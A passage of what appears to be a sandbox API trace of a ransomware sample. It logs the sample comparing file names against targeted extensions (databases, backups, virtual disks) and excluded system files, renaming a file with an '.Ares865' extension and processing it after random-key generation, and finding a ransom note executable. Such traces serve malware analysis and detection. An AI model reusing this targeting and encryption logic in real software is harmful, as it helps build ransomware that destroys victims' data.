[0089.072] lstrcmpiW (lpString1="GRL", lpString2="rod") returned -1 [0089.072] lstrlenW (lpString="rodx") returned 4 [0089.072] lstrcmpiW (lpString1=".GRL", lpString2="rodx") returned -1 [0089.072] lstrlenW (lpString="rpd") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="rpd") returned -1 [0089.072] lstrlenW (lpString="rsd") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="rsd") returned -1 [0089.072] lstrlenW (lpString="sas7bdat") returned 8 [0089.072] lstrcmpiW (lpString1="tive.GRL", lpString2="sas7bdat") returned 1 [0089.072] lstrlenW (lpString="sbf") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="sbf") returned -1 [0089.072] lstrlenW (lpString="scx") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="scx") returned -1 [0089.072] lstrlenW (lpString="sdb") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="sdb") returned -1 [0089.072] lstrlenW (lpString="sdc") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="sdc") returned -1 [0089.072] lstrlenW (lpString="sdf") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="sdf") returned -1 [0089.072] lstrlenW (lpString="sis") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="sis") returned -1 [0089.072] lstrlenW (lpString="spq") returned 3 [0089.072] lstrcmpiW (lpString1="GRL", lpString2="spq") returned -1 [0089.072] lstrlenW (lpString="te") returned 2 [0089.072] lstrcmpiW (lpString1="RL", lpString2="te") returned -1 [0089.072] lstrlenW (lpString="teacher") returned 7 [0089.072] lstrcmpiW (lpString1="ive.GRL", lpString2="teacher") returned -1 [0089.072] lstrlenW (lpString="tmd") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="tmd") returned -1 [0089.073] lstrlenW (lpString="tps") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="tps") returned -1 [0089.073] lstrlenW (lpString="trc") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="trc") returned -1 [0089.073] lstrlenW (lpString="trc") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="trc") returned -1 [0089.073] lstrlenW (lpString="trm") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="trm") returned -1 [0089.073] lstrlenW (lpString="udb") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="udb") returned -1 [0089.073] lstrlenW (lpString="udl") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="udl") returned -1 [0089.073] lstrlenW (lpString="usr") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="usr") returned -1 [0089.073] lstrlenW (lpString="v12") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="v12") returned -1 [0089.073] lstrlenW (lpString="vis") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="vis") returned -1 [0089.073] lstrlenW (lpString="vpd") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="vpd") returned -1 [0089.073] lstrlenW (lpString="vvv") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="vvv") returned -1 [0089.073] lstrlenW (lpString="wdb") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="wdb") returned -1 [0089.073] lstrlenW (lpString="wmdb") returned 4 [0089.073] lstrcmpiW (lpString1=".GRL", lpString2="wmdb") returned -1 [0089.073] lstrlenW (lpString="wrk") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="wrk") returned -1 [0089.073] lstrlenW (lpString="xdb") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="xdb") returned -1 [0089.073] lstrlenW (lpString="xld") returned 3 [0089.073] lstrcmpiW (lpString1="GRL", lpString2="xld") returned -1 [0089.073] lstrlenW (lpString="xmlff") returned 5 [0089.073] lstrcmpiW (lpString1="e.GRL", lpString2="xmlff") returned -1 [0089.073] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL.Ares865") returned 50 [0089.073] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL.Ares865" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl.ares865"), dwFlags=0x1) returned 1 [0089.074] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL.Ares865" (normalized: "c:\\users\\all users\\microsoft\\mf\\active.grl.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.074] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14972) returned 1 [0089.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.075] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.075] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.076] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.076] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.076] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d80, lpName=0x0) returned 0x15c [0089.076] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d80) returned 0x190000 [0089.079] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.080] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.080] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.080] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.080] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.080] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.081] CloseHandle (hObject=0x15c) returned 1 [0089.081] CloseHandle (hObject=0x118) returned 1 [0089.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.082] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.082] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c65bbc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c65bbc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.082] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.082] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="aoldtz.exe") returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2=".") returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="..") returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="windows") returned -1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="bootmgr") returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="temp") returned -1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="pagefile.sys") returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="boot") returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="ids.txt") returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="ntuser.dat") returned 1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="perflogs") returned -1 [0089.082] lstrcmpiW (lpString1="Pending.GRL", lpString2="MSBuild") returned 1 [0089.082] lstrlenW (lpString="Pending.GRL") returned 11 [0089.082] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL") returned 42 [0089.082] lstrcpyW (in: lpString1=0x2cce440, lpString2="Pending.GRL" | out: lpString1="Pending.GRL") returned="Pending.GRL" [0089.082] lstrlenW (lpString="Pending.GRL") returned 11 [0089.082] lstrlenW (lpString="Ares865") returned 7 [0089.082] lstrcmpiW (lpString1="ing.GRL", lpString2="Ares865") returned 1 [0089.082] lstrlenW (lpString=".dll") returned 4 [0089.083] lstrcmpiW (lpString1="Pending.GRL", lpString2=".dll") returned 1 [0089.083] lstrlenW (lpString=".lnk") returned 4 [0089.083] lstrcmpiW (lpString1="Pending.GRL", lpString2=".lnk") returned 1 [0089.083] lstrlenW (lpString=".ini") returned 4 [0089.083] lstrcmpiW (lpString1="Pending.GRL", lpString2=".ini") returned 1 [0089.083] lstrlenW (lpString=".sys") returned 4 [0089.083] lstrcmpiW (lpString1="Pending.GRL", lpString2=".sys") returned 1 [0089.083] lstrlenW (lpString="Pending.GRL") returned 11 [0089.083] lstrlenW (lpString="bak") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="bak") returned 1 [0089.083] lstrlenW (lpString="ba_") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="ba_") returned 1 [0089.083] lstrlenW (lpString="dbb") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="dbb") returned 1 [0089.083] lstrlenW (lpString="vmdk") returned 4 [0089.083] lstrcmpiW (lpString1=".GRL", lpString2="vmdk") returned -1 [0089.083] lstrlenW (lpString="rar") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="rar") returned -1 [0089.083] lstrlenW (lpString="zip") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="zip") returned -1 [0089.083] lstrlenW (lpString="tgz") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="tgz") returned -1 [0089.083] lstrlenW (lpString="vbox") returned 4 [0089.083] lstrcmpiW (lpString1=".GRL", lpString2="vbox") returned -1 [0089.083] lstrlenW (lpString="vdi") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="vdi") returned -1 [0089.083] lstrlenW (lpString="vhd") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="vhd") returned -1 [0089.083] lstrlenW (lpString="vhdx") returned 4 [0089.083] lstrcmpiW (lpString1=".GRL", lpString2="vhdx") returned -1 [0089.083] lstrlenW (lpString="avhd") returned 4 [0089.083] lstrcmpiW (lpString1=".GRL", lpString2="avhd") returned -1 [0089.083] lstrlenW (lpString="db") returned 2 [0089.083] lstrcmpiW (lpString1="RL", lpString2="db") returned 1 [0089.083] lstrlenW (lpString="db2") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="db2") returned 1 [0089.083] lstrlenW (lpString="db3") returned 3 [0089.083] lstrcmpiW (lpString1="GRL", lpString2="db3") returned 1 [0089.084] lstrlenW (lpString="dbf") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="dbf") returned 1 [0089.084] lstrlenW (lpString="mdf") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="mdf") returned -1 [0089.084] lstrlenW (lpString="mdb") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="mdb") returned -1 [0089.084] lstrlenW (lpString="sql") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="sql") returned -1 [0089.084] lstrlenW (lpString="sqlite") returned 6 [0089.084] lstrcmpiW (lpString1="ng.GRL", lpString2="sqlite") returned -1 [0089.084] lstrlenW (lpString="sqlite3") returned 7 [0089.084] lstrcmpiW (lpString1="ing.GRL", lpString2="sqlite3") returned -1 [0089.084] lstrlenW (lpString="sqlitedb") returned 8 [0089.084] lstrcmpiW (lpString1="ding.GRL", lpString2="sqlitedb") returned -1 [0089.084] lstrlenW (lpString="xml") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="xml") returned -1 [0089.084] lstrlenW (lpString="$er") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="$er") returned 1 [0089.084] lstrlenW (lpString="4dd") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="4dd") returned 1 [0089.084] lstrlenW (lpString="4dl") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="4dl") returned 1 [0089.084] lstrlenW (lpString="^^^") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="^^^") returned 1 [0089.084] lstrlenW (lpString="abs") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="abs") returned 1 [0089.084] lstrlenW (lpString="abx") returned 3 [0089.084] lstrcmpiW (lpString1="GRL", lpString2="abx") returned 1 [0089.084] lstrlenW (lpString="accdb") returned 5 [0089.084] lstrcmpiW (lpString1="g.GRL", lpString2="accdb") returned 1 [0089.084] lstrlenW (lpString="accdc") returned 5 [0089.084] lstrcmpiW (lpString1="g.GRL", lpString2="accdc") returned 1 [0089.084] lstrlenW (lpString="accde") returned 5 [0089.084] lstrcmpiW (lpString1="g.GRL", lpString2="accde") returned 1 [0089.084] lstrlenW (lpString="accdr") returned 5 [0089.084] lstrcmpiW (lpString1="g.GRL", lpString2="accdr") returned 1 [0089.084] lstrlenW (lpString="accdt") returned 5 [0089.084] lstrcmpiW (lpString1="g.GRL", lpString2="accdt") returned 1 [0089.084] lstrlenW (lpString="accdw") returned 5 [0089.085] lstrcmpiW (lpString1="g.GRL", lpString2="accdw") returned 1 [0089.085] lstrlenW (lpString="accft") returned 5 [0089.085] lstrcmpiW (lpString1="g.GRL", lpString2="accft") returned 1 [0089.085] lstrlenW (lpString="adb") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="adb") returned 1 [0089.085] lstrlenW (lpString="adb") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="adb") returned 1 [0089.085] lstrlenW (lpString="ade") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="ade") returned 1 [0089.085] lstrlenW (lpString="adf") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="adf") returned 1 [0089.085] lstrlenW (lpString="adn") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="adn") returned 1 [0089.085] lstrlenW (lpString="adp") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="adp") returned 1 [0089.085] lstrlenW (lpString="alf") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="alf") returned 1 [0089.085] lstrlenW (lpString="ask") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="ask") returned 1 [0089.085] lstrlenW (lpString="btr") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="btr") returned 1 [0089.085] lstrlenW (lpString="cat") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="cat") returned 1 [0089.085] lstrlenW (lpString="cdb") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="cdb") returned 1 [0089.085] lstrlenW (lpString="ckp") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="ckp") returned 1 [0089.085] lstrlenW (lpString="cma") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="cma") returned 1 [0089.085] lstrlenW (lpString="cpd") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="cpd") returned 1 [0089.085] lstrlenW (lpString="dacpac") returned 6 [0089.085] lstrcmpiW (lpString1="ng.GRL", lpString2="dacpac") returned 1 [0089.085] lstrlenW (lpString="dad") returned 3 [0089.085] lstrcmpiW (lpString1="GRL", lpString2="dad") returned 1 [0089.085] lstrlenW (lpString="dadiagrams") returned 10 [0089.086] lstrcmpiW (lpString1="ending.GRL", lpString2="dadiagrams") returned 1 [0089.086] lstrlenW (lpString="daschema") returned 8 [0089.086] lstrcmpiW (lpString1="ding.GRL", lpString2="daschema") returned 1 [0089.086] lstrlenW (lpString="db-journal") returned 10 [0089.086] lstrcmpiW (lpString1="ending.GRL", lpString2="db-journal") returned 1 [0089.086] lstrlenW (lpString="db-shm") returned 6 [0089.086] lstrcmpiW (lpString1="ng.GRL", lpString2="db-shm") returned 1 [0089.086] lstrlenW (lpString="db-wal") returned 6 [0089.086] lstrcmpiW (lpString1="ng.GRL", lpString2="db-wal") returned 1 [0089.086] lstrlenW (lpString="dbc") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="dbc") returned 1 [0089.086] lstrlenW (lpString="dbs") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="dbs") returned 1 [0089.086] lstrlenW (lpString="dbt") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="dbt") returned 1 [0089.086] lstrlenW (lpString="dbv") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="dbv") returned 1 [0089.086] lstrlenW (lpString="dbx") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="dbx") returned 1 [0089.086] lstrlenW (lpString="dcb") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="dcb") returned 1 [0089.086] lstrlenW (lpString="dct") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="dct") returned 1 [0089.086] lstrlenW (lpString="dcx") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="dcx") returned 1 [0089.086] lstrlenW (lpString="ddl") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="ddl") returned 1 [0089.086] lstrlenW (lpString="dlis") returned 4 [0089.086] lstrcmpiW (lpString1=".GRL", lpString2="dlis") returned -1 [0089.086] lstrlenW (lpString="dp1") returned 3 [0089.086] lstrcmpiW (lpString1="GRL", lpString2="dp1") returned 1 [0089.086] lstrlenW (lpString="dqy") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="dqy") returned 1 [0089.087] lstrlenW (lpString="dsk") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="dsk") returned 1 [0089.087] lstrlenW (lpString="dsn") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="dsn") returned 1 [0089.087] lstrlenW (lpString="dtsx") returned 4 [0089.087] lstrcmpiW (lpString1=".GRL", lpString2="dtsx") returned -1 [0089.087] lstrlenW (lpString="dxl") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="dxl") returned 1 [0089.087] lstrlenW (lpString="eco") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="eco") returned 1 [0089.087] lstrlenW (lpString="ecx") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="ecx") returned 1 [0089.087] lstrlenW (lpString="edb") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="edb") returned 1 [0089.087] lstrlenW (lpString="epim") returned 4 [0089.087] lstrcmpiW (lpString1=".GRL", lpString2="epim") returned -1 [0089.087] lstrlenW (lpString="fcd") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="fcd") returned 1 [0089.087] lstrlenW (lpString="fdb") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="fdb") returned 1 [0089.087] lstrlenW (lpString="fic") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="fic") returned 1 [0089.087] lstrlenW (lpString="flexolibrary") returned 12 [0089.087] lstrlenW (lpString="fm5") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="fm5") returned 1 [0089.087] lstrlenW (lpString="fmp") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="fmp") returned 1 [0089.087] lstrlenW (lpString="fmp12") returned 5 [0089.087] lstrcmpiW (lpString1="g.GRL", lpString2="fmp12") returned 1 [0089.087] lstrlenW (lpString="fmpsl") returned 5 [0089.087] lstrcmpiW (lpString1="g.GRL", lpString2="fmpsl") returned 1 [0089.087] lstrlenW (lpString="fol") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="fol") returned 1 [0089.087] lstrlenW (lpString="fp3") returned 3 [0089.087] lstrcmpiW (lpString1="GRL", lpString2="fp3") returned 1 [0089.087] lstrlenW (lpString="fp4") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="fp4") returned 1 [0089.088] lstrlenW (lpString="fp5") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="fp5") returned 1 [0089.088] lstrlenW (lpString="fp7") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="fp7") returned 1 [0089.088] lstrlenW (lpString="fpt") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="fpt") returned 1 [0089.088] lstrlenW (lpString="frm") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="frm") returned 1 [0089.088] lstrlenW (lpString="gdb") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="gdb") returned 1 [0089.088] lstrlenW (lpString="gdb") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="gdb") returned 1 [0089.088] lstrlenW (lpString="grdb") returned 4 [0089.088] lstrcmpiW (lpString1=".GRL", lpString2="grdb") returned -1 [0089.088] lstrlenW (lpString="gwi") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="gwi") returned -1 [0089.088] lstrlenW (lpString="hdb") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="hdb") returned -1 [0089.088] lstrlenW (lpString="his") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="his") returned -1 [0089.088] lstrlenW (lpString="ib") returned 2 [0089.088] lstrcmpiW (lpString1="RL", lpString2="ib") returned 1 [0089.088] lstrlenW (lpString="idb") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="idb") returned -1 [0089.088] lstrlenW (lpString="ihx") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="ihx") returned -1 [0089.088] lstrlenW (lpString="itdb") returned 4 [0089.088] lstrcmpiW (lpString1=".GRL", lpString2="itdb") returned -1 [0089.088] lstrlenW (lpString="itw") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="itw") returned -1 [0089.088] lstrlenW (lpString="jet") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="jet") returned -1 [0089.088] lstrlenW (lpString="jtx") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="jtx") returned -1 [0089.088] lstrlenW (lpString="kdb") returned 3 [0089.088] lstrcmpiW (lpString1="GRL", lpString2="kdb") returned -1 [0089.088] lstrlenW (lpString="kexi") returned 4 [0089.089] lstrcmpiW (lpString1=".GRL", lpString2="kexi") returned -1 [0089.089] lstrlenW (lpString="kexic") returned 5 [0089.089] lstrcmpiW (lpString1="g.GRL", lpString2="kexic") returned -1 [0089.089] lstrlenW (lpString="kexis") returned 5 [0089.089] lstrcmpiW (lpString1="g.GRL", lpString2="kexis") returned -1 [0089.089] lstrlenW (lpString="lgc") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="lgc") returned -1 [0089.089] lstrlenW (lpString="lwx") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="lwx") returned -1 [0089.089] lstrlenW (lpString="maf") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="maf") returned -1 [0089.089] lstrlenW (lpString="maq") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="maq") returned -1 [0089.089] lstrlenW (lpString="mar") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="mar") returned -1 [0089.089] lstrlenW (lpString="marshal") returned 7 [0089.089] lstrcmpiW (lpString1="ing.GRL", lpString2="marshal") returned -1 [0089.089] lstrlenW (lpString="mas") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="mas") returned -1 [0089.089] lstrlenW (lpString="mav") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="mav") returned -1 [0089.089] lstrlenW (lpString="maw") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="maw") returned -1 [0089.089] lstrlenW (lpString="mdbhtml") returned 7 [0089.089] lstrcmpiW (lpString1="ing.GRL", lpString2="mdbhtml") returned -1 [0089.089] lstrlenW (lpString="mdn") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="mdn") returned -1 [0089.089] lstrlenW (lpString="mdt") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="mdt") returned -1 [0089.089] lstrlenW (lpString="mfd") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="mfd") returned -1 [0089.089] lstrlenW (lpString="mpd") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="mpd") returned -1 [0089.089] lstrlenW (lpString="mrg") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="mrg") returned -1 [0089.089] lstrlenW (lpString="mud") returned 3 [0089.089] lstrcmpiW (lpString1="GRL", lpString2="mud") returned -1 [0089.090] lstrlenW (lpString="mwb") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="mwb") returned -1 [0089.090] lstrlenW (lpString="myd") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="myd") returned -1 [0089.090] lstrlenW (lpString="ndf") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="ndf") returned -1 [0089.090] lstrlenW (lpString="nnt") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="nnt") returned -1 [0089.090] lstrlenW (lpString="nrmlib") returned 6 [0089.090] lstrcmpiW (lpString1="ng.GRL", lpString2="nrmlib") returned -1 [0089.090] lstrlenW (lpString="ns2") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="ns2") returned -1 [0089.090] lstrlenW (lpString="ns3") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="ns3") returned -1 [0089.090] lstrlenW (lpString="ns4") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="ns4") returned -1 [0089.090] lstrlenW (lpString="nsf") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="nsf") returned -1 [0089.090] lstrlenW (lpString="nv") returned 2 [0089.090] lstrcmpiW (lpString1="RL", lpString2="nv") returned 1 [0089.090] lstrlenW (lpString="nv2") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="nv2") returned -1 [0089.090] lstrlenW (lpString="nwdb") returned 4 [0089.090] lstrcmpiW (lpString1=".GRL", lpString2="nwdb") returned -1 [0089.090] lstrlenW (lpString="nyf") returned 3 [0089.090] lstrcmpiW (lpString1="GRL", lpString2="nyf") returned -1 [0089.090] lstrlenW (lpString="odb") returned 3 [0089.090] lstrcmpiW 